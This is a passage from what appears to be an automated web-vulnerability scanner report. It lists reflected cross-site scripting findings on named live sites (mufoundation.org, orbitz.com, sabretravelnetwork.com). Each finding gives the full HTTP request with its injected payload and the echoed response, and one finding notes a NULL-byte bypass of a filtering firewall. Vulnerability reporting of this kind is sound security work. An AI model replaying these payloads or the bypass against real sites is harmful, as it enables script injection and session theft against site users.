Cache-Control: no-cache, no-store
Expires: Mon, 03 Oct 2011 00:02:58 GMT
Date: Mon, 03 Oct 2011 00:02:58 GMT
Content-Length: 12312
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="descriptionTag" name="des
...[SNIP]...
<script language='Javascript'> document.getElementById('searchboxGSA').value ="bond interest eurob5ea6";alert(1)//9b951a12e8a" ; </script>
...[SNIP]...
4.346. http://www.mufoundation.org/Search.aspx [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mufoundation.org
Path:   /Search.aspx

Issue detail

The value of the search request parameter is copied into the HTML document as plain text between tags. The payload c1b24<script>alert(1)</script>8c54598a5cd was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search.aspx?search=bond%20interest%20euroc1b24<script>alert(1)</script>8c54598a5cd HTTP/1.1
Host: www.mufoundation.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mufoundation.org/en/Charities.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CP=null*; __utma=1.1494158951.1317599905.1317599905.1317599905.1; __utmb=1.4.10.1317599905; __utmc=1; __utmz=1.1317599905.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: WEB-P01
Vary: Accept-Encoding
Cache-Control: no-cache, no-store
Expires: Mon, 03 Oct 2011 00:02:59 GMT
Date: Mon, 03 Oct 2011 00:02:59 GMT
Content-Length: 12385
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="descriptionTag" name="des
...[SNIP]...
<div id="scResultsFor">
Results for:
bond interest euroc1b24<script>alert(1)</script>8c54598a5cd
</div>
...[SNIP]...
4.347. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The value of the destination request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 850cd"style%3d"x%3aexpression(alert(1))"325283acfab9491f6 was submitted in the destination parameter. This input was echoed as 850cd"style="x:expression(alert(1))"325283acfab9491f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /App/SubmitQuickSearch?z=7651&r=6bk&searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=+&previousBot=&currentBot=&isBot=true&isBasicDataPersistenceOnly=true&isFlex=&flightType=roundtrip&origin=BOS&destination=MIA850cd"style%3d"x%3aexpression(alert(1))"325283acfab9491f6&startDate=10%2F11%2F11&useStartCal=true&startTime=Anytime&endDate=10%2F24%2F11&useEndCal=true&endTime=Anytime&adults=1&Search.x=true HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2192p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA850cd%22style%3D%22x%3Aexpression%28alert%281%29%29%22325283acfab9491f6|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:43:41 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS||10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:43:41 GMT; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:43:41 GMT
Content-Length: 160764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<input type="text" name="destination" id="airDestination" class="locationInput hasError" value="MIA850CD"STYLE="X:EXPRESSION(ALERT(1))"325283ACFAB9491F6" />
...[SNIP]...
4.348. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The value of the destination request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d8a1"style%3d"x%3aexpression(alert(1))"6e49be09e98d299c6 was submitted in the destination parameter. This input was echoed as 1d8a1"style="x:expression(alert(1))"6e49be09e98d299c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /App/SubmitQuickSearch?z=bfe6&r=h&searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=+&previousBot=&currentBot=&isBot=true&isBasicDataPersistenceOnly=true&isFlex=&flightType=roundtrip&origin=bos&destination=mia1d8a1"style%3d"x%3aexpression(alert(1))"6e49be09e98d299c6&startDate=mm%2Fdd%2Fyy&useStartCal=true&startTime=Anytime&endDate=mm%2Fdd%2Fyy&useEndCal=true&endTime=Anytime&adults=1&Search.x=true HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598467266:ss=1317596806325; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp33p|859365d23b27b43ebaadba5a; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|bos|mia1d8a1%22style%3D%22x%3Aexpression%28alert%281%29%29%226e49be09e98d299c6|mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:36:04 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS||mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:36:04 GMT; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:36:04 GMT
Content-Length: 157844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<input type="text" name="destination" id="airDestination" class="locationInput hasError" value="MIA1D8A1"STYLE="X:EXPRESSION(ALERT(1))"6E49BE09E98D299C6" />
...[SNIP]...
4.349. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The value of the destination request parameter is copied into the HTML document as plain text between tags. The payload bd6fc<a>fa2c330f76f was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /App/SubmitQuickSearch?z=dc61&r=39i HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 640
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=bfe6&r=h
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603930|PC#1317600406536-142286.19#1320194070|check#true#1317602130; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598506468:ss=1317596806325

searchType=airhotel&source=advanced&searchTab=&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=+&previousBot=&currentBot=&isBot=true&isBasicDataPersistenceOnly=true&isFlex=&flightType=roundtrip&origin=BOS&destination=MIAbd6fc<a>fa2c330f76f&startDate=10%2F04%2F11&useStartCal=true&startTimeType=Depart&startTime=Anytime&endDate=10%2F11%2F11&useEndCal=true&endTimeType=Depart&endTime=Anytime&adults=1&seniors=0&youths=0&children=0&infantsWit
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2192p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: PackagingContext=APH; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:55:35 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS||10/04/11|||||||MIA|BOS||10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:55:35 GMT; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:55:35 GMT
Content-Length: 65588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<p class="error">We can't find the following location: "MIAbd6fc<a>fa2c330f76f". Please check the spelling, and enter a city name or airport code.</p>
...[SNIP]...
4.350. http://www.orbitz.com/App/SubmitQuickSearch [origin parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The value of the origin request parameter is copied into the HTML document as plain text between tags. The payload 5997f<a>49d5ff584c8 was submitted in the origin parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /App/SubmitQuickSearch?z=dc61&r=39i HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 640
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=bfe6&r=h
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603930|PC#1317600406536-142286.19#1320194070|check#true#1317602130; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598506468:ss=1317596806325

searchType=airhotel&source=advanced&searchTab=&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=+&previousBot=&currentBot=&isBot=true&isBasicDataPersistenceOnly=true&isFlex=&flightType=roundtrip&origin=BOS5997f<a>49d5ff584c8&destination=MIA&startDate=10%2F04%2F11&useStartCal=true&startTimeType=Depart&startTime=Anytime&endDate=10%2F11%2F11&useEndCal=true&endTimeType=Depart&endTime=Anytime&adults=1&seniors=0&youths=0&child
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2192p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: PackagingContext=APH; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:55:27 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6||MIA|10/04/11|||||||MIA|BOS||10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:55:27 GMT; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:55:26 GMT
Content-Length: 65550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<p class="error">We can't find the following location: "BOS5997f<a>49d5ff584c8". Please check the spelling, and enter a city name or airport code.</p>
...[SNIP]...
4.351. http://www.sabretravelnetwork.com/home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55bd4"><script>alert(1)</script>0ad586733cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home55bd4"><script>alert(1)</script>0ad586733cb?css=includes/local_exceptions.v.1235614021 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618493; expires=Tue, 02-Oct-2012 00:08:13 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:08:13 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13356


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4"><script>alert(1)</script>0ad586733cb?css=includes/local_exceptions.v.1235614021">
...[SNIP]...
4.352. http://www.sabretravelnetwork.com/home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0665<a>d9bbd13bca2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homeb0665<a>d9bbd13bca2?css=includes/local_exceptions.v.1235614021 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618493; expires=Tue, 02-Oct-2012 00:08:13 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:08:14 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13230


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>d9bbd13bca2?css=includes">homeb0665<a>d9bbd13bca2?css=includes</a>
...[SNIP]...
4.353. http://www.sabretravelnetwork.com/home/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a0336<a>37f18bb685c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homea0336<a>37f18bb685c/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
